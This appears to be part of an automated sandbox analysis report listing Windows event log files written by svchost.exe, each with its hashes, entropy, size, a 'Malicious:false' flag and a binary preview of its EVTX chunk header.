                                              Encrypted:false
                                              SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                              MD5:2BB73ACC8F7419459C4BF931AB85352C
                                              SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                              SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                              SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                              Malicious:false
                                              Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.0631557320109892
                                              Encrypted:false
                                              SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                              MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                              SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                              SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                              SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                              Malicious:false
                                              Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.4467272005363894
                                              Encrypted:false
                                              SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                              MD5:155681C222D825199B738E8DEC707DC8
                                              SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                              SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                              SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                              Malicious:false
                                              Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.156155224835584
                                              Encrypted:false
                                              SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                              MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                              SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                              SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                              SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                              Malicious:false
                                              Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.9197999988543422
                                              Encrypted:false
                                              SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                              MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                              SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                              SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                              SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                              Malicious:false
                                              Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):5.718426658668259
                                              Encrypted:false
                                              SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                              MD5:8630011707C7BFBCECC0A9430637802E
                                              SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                              SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                              SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                              Malicious:false
                                              Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9963080376858662
                                              Encrypted:false
                                              SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                              MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                              SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                              SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                              SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                              Malicious:false
                                              Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.076996627399968
                                              Encrypted:false
                                              SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                              MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                              SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                              SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                              SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                              Malicious:false
                                              Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):83408
                                              Entropy (8bit):3.449834284741231
                                              Encrypted:false
                                              SSDEEP:384:hAILaGINILIRINIZu2IK4IoGiIqIyI+IfIaIzIbNINImIgIsIJvHIsICICvhDIEy:hGzZvZxGp9ez
                                              MD5:F238409A4727E4A63CDACB2BCCF9E0D6
                                              SHA1:4689656E1F7C804217C01646F631825AA9EA868E
                                              SHA-256:0343DCA8A2B01DA8660318479790E3CA4607B1BF72B6192BB0ED8F3D153DB622
                                              SHA-512:2D9F233105ED3C30D951685DA9DB09581DA4BD8D34B2960EC4ED56525A96931503A8CB1FEE714E83F505A50D4C9B933C8DF2C4CD0B90952A194DAC35C2F1D670
                                              Malicious:false
                                              Preview:ElfChnk.T...............T...................x...h....c0^................................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a.................................**......z.......Kz[.t..............a..............................................................,.......D.....!........... ....@Kz[.t...@..^<.....fX............z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.801423310886069
                                              Encrypted:false
                                              SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                              MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                              SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                              SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                              SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                              Malicious:false
                                              Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.996272372482282
                                              Encrypted:false
                                              SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                              MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                              SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                              SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                              SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                              Malicious:false
                                              Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):70976
                                              Entropy (8bit):3.8470318955927745
                                              Encrypted:false
                                              SSDEEP:768:ssknssknhutDBjV8k+u7xQUtHpoVWWx07SZRcZv76NcRUjGHzLKvc90XKcZv76NI:GGhutDBjV8k+u7xRtHpoVW
                                              MD5:BA854A39A100840BEC17D5635D46EB90
                                              SHA1:2A75512B8FF36C1DB10425D8B79652E7B52AC5AC
                                              SHA-256:D7404633BD9421DA38C46A6A5C71C75149B1A7F7EE9E7487DF86BF827ECFE1B3
                                              SHA-512:5CD8EE2A1894EF40410B79697BCDC572344AFFD78A8F04BC8E3EB628C982623488892B9E8BE6E05BCD7CAE970397B56CD27C17F62088B3B4A80F04DD25A08D67
                                              Malicious:false
                                              Preview:ElfChnk.................O.......W...............@.....'.........................................................................................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.........s.t.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.734922688384225
                                              Encrypted:false
                                              SSDEEP:384:Xh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnq:XkN2cTOsKFxFG/uNrjzDbRt
                                              MD5:2610214E00C1A9796BD39AE7419F10F6
                                              SHA1:FE4FB1ECFEE84FD91650B6BAE911334B03B52236
                                              SHA-256:940D8BD36FEC5DE7370746796A31915B17D097C4A7E140F2C340A89F9B9AF275
                                              SHA-512:2B4E4C79406CA10844BE011915A2B4209D820215E5D094953A460AF1D63A0DD53A56FCD69916F3AFC60B1254E93F3EFA20CB0CC1AA2D2D3DC4C184AF3555DC70
                                              Malicious:false
                                              Preview:ElfChnk..............................................[..........................................................................................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.7590316238843728
                                              Encrypted:false
                                              SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                              MD5:B074238315662886E2BD70106D08A747
                                              SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                              SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                              SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                              Malicious:false
                                              Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):3.751147757884054
                                              Encrypted:false
                                              SSDEEP:1536:GvXhnUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMj1:GvXBnS
                                              MD5:BDEFE3A619FE0B174877DE818F797486
                                              SHA1:8BCDF6FA7B1B136F7624FBEC89534E02030FEC32
                                              SHA-256:41F2FE7EC15A8857543C317B2BFAAC3C5F89EFBA0123667B8A0DD13AC35D5DDD
                                              SHA-512:412FF39A8F3E265E3483CAE77D3044B74A87F8491A3BC7FCD1396F2E202D42589F0230A31F1C6E12FE39C4D225F1EC111BDCF59AAA9A33092D01A637B9170E89
                                              Malicious:false
                                              Preview:ElfChnk.........%...............%............E..`G..)t.^.....................................................................E..................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):2.3069197485541766
                                              Encrypted:false
                                              SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                                              MD5:E6E4C860CE7DD1BB499D6A082B461B90
                                              SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                                              SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                                              SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                                              Malicious:false
                                              Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):127536
                                              Entropy (8bit):4.001334382986197
                                              Encrypted:false
                                              SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSq+h0w+qLpBVi7CPME79nCxkSqOk:c0w+qtBViz0w+qtBVidk
                                              MD5:A75E1E5D8740D17E8BF839E5FC83264F
                                              SHA1:B39EE20887DA1AB2162E044AE1959D902C37CC2F
                                              SHA-256:5F956C972C502225FC76F52CFE56086E02A255F72850BE979E9A294F64B88F42
                                              SHA-512:34560D2FDDDABAD35397C13B9796B97529F38B0B430CC8F6DE1076869FA6B6CACB8ED7F7DEFFAAE05367369B14A7A40AC6140DD4D48C4AE022B0DBB3DD0D6EC5
                                              Malicious:false
                                              Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.2909571978750325
                                              Encrypted:false
                                              SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                                              MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                                              SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                                              SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                                              SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                                              Malicious:false
                                              Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.488768580471203
                                              Encrypted:false
                                              SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                                              MD5:E3FB1708C64D250E4D801AFB8688DF35
                                              SHA1:8B889F0358683733257411E451A86E3A1D42159D
                                              SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                                              SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                                              Malicious:false
                                              Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):4.494514087283264
                                              Encrypted:false
                                              SSDEEP:1536:NcRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20GF:NcRFkL1TWX0gkB/J7oasEfyk2/vKlqkd
                                              MD5:91E223DFCAF55A7CB4A1E7DAB970489E
                                              SHA1:AAA4DDA7FE0F4AA56A0D29A294489A69CC182029
                                              SHA-256:87BB1FB8358676FBD066859447D2DF2BC5EDC7FFA68478816CA79361193D0997
                                              SHA-512:B052F6C6DD960C66D2B639CBEBCB20BCA73108BB1EA384A40C0CA522E615454D2107A9E7E99192A88A5F52C7E931D7140B818DA367D4AF32E5C3C7EDE29E331A
                                              Malicious:false
